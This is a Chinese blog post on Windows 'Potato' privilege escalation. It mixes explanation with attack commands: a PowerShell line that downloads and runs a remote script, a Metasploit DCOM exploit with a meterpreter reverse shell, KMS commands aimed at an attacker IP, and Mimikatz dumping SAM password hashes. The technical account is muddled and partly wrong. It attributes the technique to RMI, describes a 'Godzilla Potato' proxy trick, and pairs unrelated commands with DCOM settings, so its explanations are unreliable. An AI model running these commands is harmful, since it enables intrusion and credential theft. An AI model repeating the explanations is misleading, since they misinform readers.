爛土豆提權

一、爛土豆提權原理

爛土豆提權是一種利用Windows系統漏洞獲得系統管理員許可權的技術手段。它利用了Windows操作系統上DCOM服務(分散式組件對象模型)的一個漏洞,通過改寫註冊表數據,然後構造數據包,遠程執行程序,從而獲得系統管理員許可權的攻擊方法。

實際上,利用DCOM服務的漏洞來提權的方式並不是爛土豆提權這個家族首創的,早在2003年,俄羅斯黑客d_know通過分析Windows XP漏洞,利用dcomcnfg.exe,注入dll文件,最終獲得了管理員許可權,這也是最早的DCOM提權攻擊。

二、哥斯拉 土豆提權

哥斯拉土豆提權(Godzilla Potato)是爛土豆提權家族的一員,在爛土豆提權的基礎上,進一步提高了攻擊的成功率。哥斯拉土豆提權利用了Windows操作系統會自動查找可用代理的功能。攻擊者可以利用一個特殊的代理伺服器來干擾這一功能,從而讓Windows選擇攻擊者控制的代理伺服器,實現提權。

三、爛土豆提權命令

iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS16-032/ms16-032_Kernel_Pool.html')

msfconsole
use exploit/windows/dcerpc/ms03_026_dcom
set RHOST IPADDR
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

四、爛土豆提權工具

爛土豆提權最為經典的工具當然是metasploit,而Black-hole的「魔改工具」也比較實用,它加入了多線程功能提高了攻擊成功率。但是由於這些工具可能會被殺軟攔截,攻擊者可以使用一些威力更小的輕量級工具,例如GadgetToJScript、PowerSploit等。

五、爛土豆提權的原理詳解

爛土豆提權所利用的漏洞源自於Windows RMI(遠程方法調用)機制的實現方式。由於Windows系統默認啟用了DCOM服務,而DCOM協議基於RMI,因此這兩者之間常常會出現安全漏洞。攻擊者可以通過RMI註冊表的許多漏洞之一來攻擊Windows系統登入。

六、土豆提權原理

爛土豆提權是土豆提權的一種變體,但它與其他土豆提權方法不同,它利用的是Windows系統不嚴密的RPC(遠程過程調用)實現方式。攻擊者可以通過RPC服務,對Windows操作系統全面地進行操控,例如枚舉本地口令哈希、執行遠程代碼等。

七、土豆家族提權

土豆家族提權實際上是土豆提權的進一步延伸,因為它包括了非常多的利用Windows系統漏洞的攻擊方式。例如,Windows操作系統XP、7等版本存在的漏洞,通過利用NTLM哈希也可以成功提權。因此,土豆家族提權也成為了黑客攻擊Windows操作系統的重要兵器。

八、土豆提權利用dcom提權的

cscript C:\windows\system32\slmgr.vbs /skms ip(攻擊者ip)
cscript C:\windows\system32\slmgr.vbs /ato 4、  
mmc.exe 
-Filepath C:\windows\system32\compmgmt.msc  
-windows下Component Services 
--計算機
---DCOM 
----combrok
------屬性
-------常規
--------下面的"Rpc工廠:允許遠程伺服器的RPC"
  

powershell 
Import-Module .\Mimikatz.ps1 
invoke-mimikatz  
"lsadump::sam" 
「exit」

原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/228831.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
小藍的頭像小藍
上一篇 2024-12-10 12:08
下一篇 2024-12-10 12:08

相關推薦

  • 兄弟連php土豆,兄弟連PHP

    本文目錄一覽: 1、兄弟連PHP課程怎麼樣 2、兄弟連學PHP難不難 3、兄弟連php教程下載 4、兄弟連PHP培訓怎麼樣? 5、兄弟連的PHP開發講的什麼內容 6、分求lamp兄…

    編程 2024-12-25

發表回復

登錄後才能評論